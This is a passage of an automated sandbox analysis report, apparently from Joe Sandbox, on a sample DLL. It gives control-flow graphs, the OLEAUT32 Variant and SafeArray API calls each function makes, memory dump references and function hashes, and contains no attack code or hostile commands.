6ceb5335 1313->1314 1314->1288 1315->1312 1316->1312
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB5177
                                              • Part of subcall function 6CEC2820: _malloc.LIBCMT ref: 6CEC2871
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CEB51B9
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEB51D5
                                            • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CEB51E5
                                            • _memmove.LIBCMT ref: 6CEB51FF
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEB5208
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB522C
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEB5263
                                            • VariantClear.OLEAUT32(?), ref: 6CEB526C
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEB52AD
                                            • VariantClear.OLEAUT32(?), ref: 6CEB52B6
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CEB52D2
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB534E
                                            • VariantClear.OLEAUT32(?), ref: 6CEB5358
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                            • String ID:
                                            • API String ID: 452649785-0
                                            • Opcode ID: 10d6f060ccdebe208a24996a9d6ec868b51ccbfe9243c763bc58f37ee03ebbed
                                            • Instruction ID: 758f9155508a16b3c36b7b4815a7e6576a8915d14f5214cb08ce03c6d9330eb4
                                            • Opcode Fuzzy Hash: 10d6f060ccdebe208a24996a9d6ec868b51ccbfe9243c763bc58f37ee03ebbed
                                            • Instruction Fuzzy Hash: 4F7139B1A0120AABDB01CFA5C985BAFBBB8FF49714F108119E915A7740D774E905CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1317 6ceb44c0-6ceb4538 VariantInit * 2 SafeArrayCreateVector 1318 6ceb453a-6ceb453d 1317->1318 1319 6ceb4542-6ceb4564 SafeArrayPutElement VariantClear 1317->1319 1318->1319 1320 6ceb456a-6ceb4598 SafeArrayCreateVector SafeArrayPutElement 1319->1320 1321 6ceb476f-6ceb4774 1319->1321 1320->1321 1322 6ceb459e-6ceb45b9 SafeArrayPutElement 1320->1322 1323 6ceb477d-6ceb479b VariantClear * 2 1321->1323 1324 6ceb4776-6ceb4777 SafeArrayDestroy 1321->1324 1322->1321 1325 6ceb45bf-6ceb45d2 SafeArrayPutElement 1322->1325 1326 6ceb479d-6ceb47ad 1323->1326 1327 6ceb47b0-6ceb47c4 1323->1327 1324->1323 1325->1321 1328 6ceb45d8-6ceb45e3 1325->1328 1326->1327 1329 6ceb45ef-6ceb4604 1328->1329 1330 6ceb45e5-6ceb45ea call 6cf0c1e0 1328->1330 1329->1321 1333 6ceb460a-6ceb4615 1329->1333 1330->1329 1333->1321 1334 6ceb461b-6ceb469f 1333->1334 1341 6ceb46a1-6ceb471f 1334->1341 1347 6ceb4721-6ceb4758 1341->1347 1350 6ceb475a call 6cef919e 1347->1350 1351 6ceb475f-6ceb476a call 6cebde60 1347->1351 1350->1351 1353 6ceb476c 1351->1353 1353->1321
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB44FF
                                            • VariantInit.OLEAUT32(?), ref: 6CEB4505
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB4516
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB4551
                                            • VariantClear.OLEAUT32(?), ref: 6CEB455A
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEB4579
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB4594
                                            • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEB45B5
                                            • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEB45CE
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEB475A
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB4777
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4787
                                            • VariantClear.OLEAUT32(?), ref: 6CEB478D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1304965753-0
                                            • Opcode ID: 4f4604f51849ca357b6f15b1bb84d7d78c349998baeb59713df8f5987007cab4
                                            • Instruction ID: 09ae4bff49cdef5fc40055224da547506037668b68affe2c2bf2fb6cb9ae3fb7
                                            • Opcode Fuzzy Hash: 4f4604f51849ca357b6f15b1bb84d7d78c349998baeb59713df8f5987007cab4
                                            • Instruction Fuzzy Hash: C5A12D75A012069BDB54DB94C984EAFB7B9FF8C714F14462DE506ABB81C630E941CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1355 6cebbf00-6cebbf6a VariantInit * 4 1356 6cebbf6c-6cebbf71 1355->1356 1357 6cebbf74-6cebbf86 1355->1357 1356->1357 1358 6cebbf88-6cebbf8d 1357->1358 1359 6cebbf90-6cebbfbb call 6cebc150 1357->1359 1358->1359 1362 6cebbfc1-6cebbfdf call 6cebc150 1359->1362 1363 6cebc0c4-6cebc0cd 1359->1363 1362->1363 1370 6cebbfe5-6cebc019 call 6cebdc40 1362->1370 1365 6cebc0cf-6cebc0df 1363->1365 1366 6cebc0e2-6cebc149 call 6cefa1f7 * 2 VariantClear * 4 call 6cef948b 1363->1366 1365->1366 1376 6cebc01b-6cebc01e 1370->1376 1377 6cebc020-6cebc029 1370->1377 1379 6cebc035-6cebc037 call 6ceb44c0 1376->1379 1380 6cebc02b-6cebc02c 1377->1380 1381 6cebc02e 1377->1381 1384 6cebc03c-6cebc03e 1379->1384 1382 6cebc030-6cebc032 1380->1382 1381->1382 1382->1379 1384->1363 1385 6cebc044-6cebc05c VariantInit VariantCopy 1384->1385 1387 6cebc05e-6cebc05f call 6cf0c1e0 1385->1387 1388 6cebc064-6cebc07a 1385->1388 1387->1388 1388->1363 1391 6cebc07c-6cebc094 VariantInit VariantCopy 1388->1391 1392 6cebc09c-6cebc0af 1391->1392 1393 6cebc096-6cebc097 call 6cf0c1e0 1391->1393 1392->1363 1396 6cebc0b1-6cebc0c0 1392->1396 1393->1392 1396->1363
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Init$Clear$Copy
                                            • String ID:
                                            • API String ID: 3833040332-0
                                            • Opcode ID: 323189114d7fc15460761a80aca24a609f9104c6752dcaf2253963a64e7ce14f
                                            • Instruction ID: 35889aad7bc76b396f783152d4f3e31b07c9c733758ba1bbb36d10090ff20bd9
                                            • Opcode Fuzzy Hash: 323189114d7fc15460761a80aca24a609f9104c6752dcaf2253963a64e7ce14f
                                            • Instruction Fuzzy Hash: 7B81AE71A01219AFCB04DFA8C980FEEBBB9FF49308F24415DE905AB740DB70A905CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1397 6ceb64d0-6ceb6552 VariantInit * 3 SafeArrayCreateVector 1398 6ceb655c-6ceb657e SafeArrayPutElement VariantClear 1397->1398 1399 6ceb6554-6ceb6559 1397->1399 1400 6ceb6661-6ceb6663 1398->1400 1401 6ceb6584-6ceb65a1 1398->1401 1399->1398 1404 6ceb666c-6ceb669d VariantClear * 3 1400->1404 1405 6ceb6665-6ceb6666 SafeArrayDestroy 1400->1405 1402 6ceb65ab-6ceb65c7 SafeArrayPutElement VariantClear 1401->1402 1403 6ceb65a3-6ceb65a6 1401->1403 1402->1400 1406 6ceb65cd-6ceb65db 1402->1406 1403->1402 1405->1404 1407 6ceb65dd-6ceb65e2 call 6cf0c1e0 1406->1407 1408 6ceb65e7-6ceb6613 1406->1408 1407->1408 1420 6ceb6616 call d6d148 1408->1420 1421 6ceb6616 call d6d149 1408->1421 1410 6ceb6618-6ceb661a 1410->1400 1411 6ceb661c-6ceb6628 1410->1411 1411->1400 1412 6ceb662a-6ceb663c call 6ceadb30 1411->1412 1412->1400 1415 6ceb663e-6ceb6650 call 6ceb56b0 call 6ceb6880 1412->1415 1419 6ceb6655-6ceb665c 1415->1419 1419->1400 1420->1410 1421->1410
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6CEB650C
                                            • VariantInit.OLEAUT32(?), ref: 6CEB6519
                                            • VariantInit.OLEAUT32(?), ref: 6CEB6520
                                            • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CEB6531
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB656D
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6576
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB65B6
                                            • VariantClear.OLEAUT32(?), ref: 6CEB65BF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6666
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6677
                                            • VariantClear.OLEAUT32(?), ref: 6CEB667E
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6685
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 1625659656-0
                                            • Opcode ID: 223000a2cf96be24a33ef84d5ba92f83d6c72cb605c8a0caf0c86d0102ebb71d
                                            • Instruction ID: 724746e9cbe716007c25f54c1bae186d36a586fae59ace301a81bfa41256f6f1
                                            • Opcode Fuzzy Hash: 223000a2cf96be24a33ef84d5ba92f83d6c72cb605c8a0caf0c86d0102ebb71d
                                            • Instruction Fuzzy Hash: 4C5137B26083019FC705DF64C880AABBBF8EFC9714F118A1DF95597650EB71E906CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1422 6cebcb90-6cebcc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1423 6cebcce7-6cebcce9 1422->1423 1424 6cebcc17-6cebcc4b SafeArrayPutElement VariantClear 1422->1424 1426 6cebcceb-6cebccec SafeArrayDestroy 1423->1426 1427 6cebccf2-6cebcd18 VariantClear * 2 1423->1427 1424->1423 1425 6cebcc51-6cebcc61 SafeArrayPutElement 1424->1425 1425->1423 1428 6cebcc67-6cebcc7b SafeArrayPutElement 1425->1428 1426->1427 1428->1423 1429 6cebcc7d-6cebcc8e 1428->1429 1430 6cebcc9a-6cebccc8 1429->1430 1431 6cebcc90-6cebcc95 call 6cf0c1e0 1429->1431 1436 6cebccc9 call d6d148 1430->1436 1437 6cebccc9 call d6d149 1430->1437 1431->1430 1433 6cebcccb-6cebcccd 1433->1423 1434 6cebcccf-6cebcce1 1433->1434 1434->1423 1435 6cebcce3 1434->1435 1435->1423 1436->1433 1437->1433
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBCBCA
                                            • VariantInit.OLEAUT32(?), ref: 6CEBCBD3
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBCBE4
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBCBF6
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBCC0D
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBCC39
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCC42
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEBCC5D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEBCC77
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBCCEC
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCCFC
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCD02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                            • String ID:
                                            • API String ID: 3548156019-0
                                            • Opcode ID: e42517bc24245f035cc93fdd0728ab06b40f9167aa35c31cddaa6c4a6607d34e
                                            • Instruction ID: 9bd3f9018617493bd9b7cf1b90dbb8181eda1637e46e2abe14274dc1e3a14185
                                            • Opcode Fuzzy Hash: e42517bc24245f035cc93fdd0728ab06b40f9167aa35c31cddaa6c4a6607d34e
                                            • Instruction Fuzzy Hash: 985141B5E0420A9FDB00DFA8C881EEEBBB8FF59714F11815AE915A7741D770A905CFA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1438 6ceaa350-6ceaa3bd VariantInit * 3 call 6ceb38e0 1441 6ceaa3c3-6ceaa3d6 1438->1441 1442 6ceaa505-6ceaa528 VariantClear * 3 1438->1442 1445 6ceaa3d8-6ceaa3dd 1441->1445 1446 6ceaa3e0-6ceaa3f7 VariantCopy 1441->1446 1443 6ceaa52a-6ceaa52d 1442->1443 1444 6ceaa532-6ceaa546 1442->1444 1443->1444 1445->1446 1447 6ceaa3f9-6ceaa3fa call 6cf0c1e0 1446->1447 1448 6ceaa3ff-6ceaa411 VariantClear 1446->1448 1447->1448 1450 6ceaa41d-6ceaa42b 1448->1450 1451 6ceaa413-6ceaa418 call 6cf0c1e0 1448->1451 1453 6ceaa42d-6ceaa42f 1450->1453 1454 6ceaa431-6ceaa433 1450->1454 1451->1450 1455 6ceaa436-6ceaa43a 1453->1455 1454->1455 1456 6ceaa43c-6ceaa43e 1455->1456 1457 6ceaa440 1455->1457 1458 6ceaa442-6ceaa477 1456->1458 1457->1458 1474 6ceaa47a call d6d148 1458->1474 1475 6ceaa47a call d6d149 1458->1475 1459 6ceaa47c-6ceaa47e 1459->1442 1460 6ceaa484-6ceaa493 1459->1460 1461 6ceaa49f-6ceaa4b0 1460->1461 1462 6ceaa495-6ceaa49a call 6cf0c1e0 1460->1462 1463 6ceaa4b2-6ceaa4b4 1461->1463 1464 6ceaa4b6-6ceaa4b8 1461->1464 1462->1461 1466 6ceaa4bb-6ceaa4bf 1463->1466 1464->1466 1467 6ceaa4c1-6ceaa4c3 1466->1467 1468 6ceaa4c5 1466->1468 1469 6ceaa4c7-6ceaa503 1467->1469 1468->1469 1469->1442 1471 6ceaa549-6ceaa578 VariantClear * 3 1469->1471 1472 6ceaa57a-6ceaa57f 1471->1472 1473 6ceaa582-6ceaa596 1471->1473 1472->1473 1474->1459 1475->1459
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$Init$Copy
                                            • String ID:
                                            • API String ID: 3214764494-0
                                            • Opcode ID: b4115348d6dde8383ad1592bd36992c0a3c091b616c074ce13334f3da0e7fe65
                                            • Instruction ID: 540af0dda041a5f17d546e1c9f54e02c855643e1cbb6a00a9d3e596111ab0671
                                            • Opcode Fuzzy Hash: b4115348d6dde8383ad1592bd36992c0a3c091b616c074ce13334f3da0e7fe65
                                            • Instruction Fuzzy Hash: B87135726483419FD300DFA9C880A5AB7F9AF89714F108A5DFA59DB791D730E805CF62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1530 6cebcd20-6cebcd97 VariantInit * 3 SafeArrayCreateVector 1531 6cebcd99-6cebcd9c 1530->1531 1532 6cebcda1-6cebcdc0 SafeArrayPutElement VariantClear 1530->1532 1531->1532 1533 6cebd2a0-6cebd2a2 1532->1533 1534 6cebcdc6-6cebcdd1 1532->1534 1535 6cebd2ab-6cebd2d7 VariantClear * 3 1533->1535 1536 6cebd2a4-6cebd2a5 SafeArrayDestroy 1533->1536 1537 6cebcddd-6cebcdef 1534->1537 1538 6cebcdd3-6cebcdd8 call 6cf0c1e0 1534->1538 1536->1535 1537->1533 1541 6cebcdf5-6cebce01 1537->1541 1538->1537 1541->1533 1542 6cebce07-6cebcea4 1541->1542 1550 6cebceba-6cebcf2b 1542->1550 1551 6cebcea6-6cebceb7 1542->1551 1557 6cebcf2d-6cebcf3e 1550->1557 1558 6cebcf41-6cebd222 1550->1558 1551->1550 1557->1558 1593 6cebd22e-6cebd25c 1558->1593 1594 6cebd224-6cebd229 call 6cf0c1e0 1558->1594 1597 6cebd25e-6cebd269 1593->1597 1598 6cebd29d 1593->1598 1594->1593 1597->1598 1599 6cebd26b-6cebd27b call 6ceadb30 1597->1599 1598->1533 1599->1598 1602 6cebd27d-6cebd28d call 6ceb56b0 call 6ceb6880 1599->1602 1606 6cebd292-6cebd299 1602->1606 1606->1598
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBCD5C
                                            • VariantInit.OLEAUT32(?), ref: 6CEBCD65
                                            • VariantInit.OLEAUT32(?), ref: 6CEBCD6B
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBCD76
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBCDAA
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCDB7
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBD2A5
                                            • VariantClear.OLEAUT32(?), ref: 6CEBD2B5
                                            • VariantClear.OLEAUT32(?), ref: 6CEBD2BB
                                            • VariantClear.OLEAUT32(?), ref: 6CEBD2C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: dc054240c5be91f37fef1a65384be33655bc2a08ef5b8d143a5a051e4199c767
                                            • Instruction ID: 240d29fccbffb120334bebd4fbe205924db37227a8d8e22135040328c324a6ec
                                            • Opcode Fuzzy Hash: dc054240c5be91f37fef1a65384be33655bc2a08ef5b8d143a5a051e4199c767
                                            • Instruction Fuzzy Hash: 7612F575A15745AFC758DB98DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1607 6ceb66a0-6ceb6725 VariantInit * 2 SafeArrayCreateVector 1608 6ceb672f-6ceb674f SafeArrayPutElement VariantClear 1607->1608 1609 6ceb6727-6ceb672a 1607->1609 1610 6ceb6755-6ceb6772 1608->1610 1611 6ceb6844-6ceb6846 1608->1611 1609->1608 1612 6ceb677c-6ceb679c SafeArrayPutElement VariantClear 1610->1612 1613 6ceb6774-6ceb6779 1610->1613 1614 6ceb6848-6ceb6849 SafeArrayDestroy 1611->1614 1615 6ceb684f-6ceb6878 VariantClear * 2 1611->1615 1612->1611 1616 6ceb67a2-6ceb67b0 1612->1616 1613->1612 1614->1615 1617 6ceb67bc-6ceb67ef 1616->1617 1618 6ceb67b2-6ceb67b7 call 6cf0c1e0 1616->1618 1630 6ceb67f2 call d6d148 1617->1630 1631 6ceb67f2 call d6d149 1617->1631 1618->1617 1620 6ceb67f4-6ceb67f6 1620->1611 1621 6ceb67f8-6ceb6805 1620->1621 1621->1611 1622 6ceb6807-6ceb681c call 6ceadb30 1621->1622 1622->1611 1625 6ceb681e-6ceb683f call 6ceb56b0 call 6ceb6880 1622->1625 1625->1611 1630->1620 1631->1620
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6CEB66DB
                                            • VariantInit.OLEAUT32 ref: 6CEB66EA
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB6700
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB673A
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6747
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB6787
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6794
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6849
                                            • VariantClear.OLEAUT32(?), ref: 6CEB685A
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6861
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
